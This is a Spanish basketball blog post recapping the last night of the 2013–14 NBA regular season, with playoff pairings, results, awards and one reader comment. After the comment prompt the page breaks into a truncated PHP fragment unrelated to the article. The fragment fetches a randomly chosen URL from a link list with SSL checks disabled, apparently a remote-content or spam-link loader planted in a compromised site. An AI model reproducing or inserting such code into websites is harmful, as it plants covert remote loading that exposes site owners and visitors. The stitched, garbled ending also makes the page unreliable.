La Crónica: Se acabaron las bromas

17 de April de 2014 por Simon

Ahora sí, tras 82 partidos de temporada regular se acabó la espera. El sábado darán inicio unas eliminatorias que finalmente han quedado configuradas de la siguiente manera:

OESTE

San Antonio Spurs (1) vs Dallas Mavericks (8)
Houston Rockets (4) vs Portland Trail Blazers (5)

Los Angeles Clippers (3) vs Golden State Warriors (6)
Oklahoma City Thunder (2) vs Memphis Grizzlies (7)

ESTE

Indiana Pacers (1) vs Atlanta Hawks (8)
Chicago Bulls (4) vs Washington Wizards (5

Toronto Raptors (3) vs Brooklyn Nets (6)
Miami Heat (2) vs Charlotte Bobcats (7)

Antes de empezar la jornada ya conocíamos los 16 equipos clasificados para playoffs pero faltaban por definirse 6 de los 8 eliminatorias. Los diferentes escenarios fueron desfilando conforme finalizaban los diferentes partidos.

La jornada la abría un trascendental Bobcats – Bulls cuyo resultado sería vital para el devenir de la jornada. Los Bobcats trataban de evitar a los Heat en las eliminatorias y los Bulls asaltar el tercer puesto de la conferencia. La victoria de Charlotte (86-91), en la prórroga tras un partido competidísimo y digno de la intensidad de Play Off, marcó el resto de enfrentamientos. A la vez que este partido se jugaba un intrascendente Indiana Pacers – Orlando Magic que terminaría con victoria de los suplentes Pacers ante unos inoperantes Magic que no pudieron ni despedirse de su afición con dignidad (101-86). 

La derrota de los Bulls llegaba aproximadamente cuando los partidos del segundo turno estaban en el descanso. Los Raptors, con el tercer puesto ya en el bolsillo, se dejaron ir en New York tras una primera parte que ganaban con mucha autoridad y permitieron remontar a los Knicks para que maquillaran un poco su récord (92-95). Con la victoria de los Bobcats, los Wizards estaban obligados a ganar sí o sí en Boston para evitar a los Heat. Por suerte para ellos, ya tenían buena parte de los deberes hechosal final del primer cuarto por lo que sólo tuvieron que mantener un poco la intensidad en el segundo tiempo para derrotar a los Celtics (118-112). Por su parte, los Nets, que ya llevaban tiempo buscando caer al sexto puesto, sólo tuvieron que desaparecer en la segunda parte ante los Cavaliers para evitar a los Bulls en primera parte (85-114).

Mientras se dilucidaban las eliminatorias en el Este, también lo hacían en el Oeste. Dallas y Memphis se peleaban por ver quién se enfrentaba a los Thunder y quien a los Spurs. Fue el primer partido de Play Off para ambos pues pelearon hasta la prórroga para tratar de evitar a Popovich y compañía. Finalmente el “premio” se lo llevaron los Grizzlies después de que Ellis fallara su lanzamiento en el último segundo (105-106). Uno no puede evitar preguntarse donde estarían los Grizzlies de no empezar la temporada de manera tan desastrosa. A punto estuvo Memphis de ver como cambiaba su rival pues los Pistons no le pusieron nada fácil la victoria a los Thunder Por suerte para Oklahoma, Detroit debe ser probablemente el peor equipo de la liga en el último cuarto lo que les permitió, exhibición de Durant mediante, remontar el partido con 6-0 de parcial en el último minuto y medio (111-112).

Con este partido quedaban definidas todas las eliminatorias de los Play Off. A partir de aquí todos los encuentros resultaban intrascendentes pero sirvieron para despedir a varios equipos. Los Bucks eran incapaces de ganar a unos Hawks jugando a medio gas y sin Millsap (111-103); los imprevisibles Wolves cayeron en casa ante los Jazz tras dos prórrogas (136-130); los Pelicans vencieron a los Rockets que ya pensaban en la eliminatoria ante los Blazers (100-105); los Lakers ganaban en San Antonio con  8 jugadores por encima de los 10 puntos (113-100); por su parte, los Sixers derrotaron a ese equipito que son los Heat sin Lebron (100-87); Phoenix Suns despidió su magnífica temporada venciendo a los Kings a domicilio (104-99); Golden State se impuso en Denver (116-112), y los suplentes de los Blazers fueron mejores que los de Clippers (104-110).

PREMIOS

MVP: En lo que normalmente es un día de suplentes, Kevin Durant tuvo que exprimirse al máximo para sacar adelante el partido frente los Pistons. Anotó 42 puntos y repartió 6 asistencias.

Rookie: Trey Burke despide el año con una fenomenal actuación: 32 puntos, 7 rebotes y 9 asistencias. Kentavious Caldwell-Powell se fue a los 30 puntos y Archie Goodwin se quedó en 29. También destacaron Ben McLemore con 31 puntos, 5 rebotes y 5 asistencias y Kelly Olynyk con 24 puntos, 7 rebotes y 5 asistencias.

Sorpresa: Jordan Crawford cogió el mando de los Warriors y lo soltó tras anotar 41 puntos.

Esfuerzo en vano: Jamal Crawford, Randy Foye, Brandon Knight… Todos anotaron más de 30 puntos pero cayeron en el último partido de la regular. Más le dolió la derrota seguramente a Dirk Nowitzki que también llegó a los 30 puntos.

Imágenes | AP Photos / Getty Images

Comenta

Un comentario a esta entrada

  1. Rompe dice:
    #1

    Bueno, dejando claro que la diferencia entre conferencias es brutal, he de decir que al final la cosa ha mejorado un poco en el Este. De los ocho equipos clasificados, sólo uno tiene un récord negativo. Y si se hiciera lo que hemos comentado muchas veces, olvidar las conferencias y que se clasifiquen a PO los 16 mejores, sólo cambiarían los Suns por los Hawks.

    Nada que ver con lo que veíamos a mitad de temporada, donde sólo los tres primeros del Este tenían récord positivo, y donde incluso el 11 del Oeste estaría en PO en el Este…

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>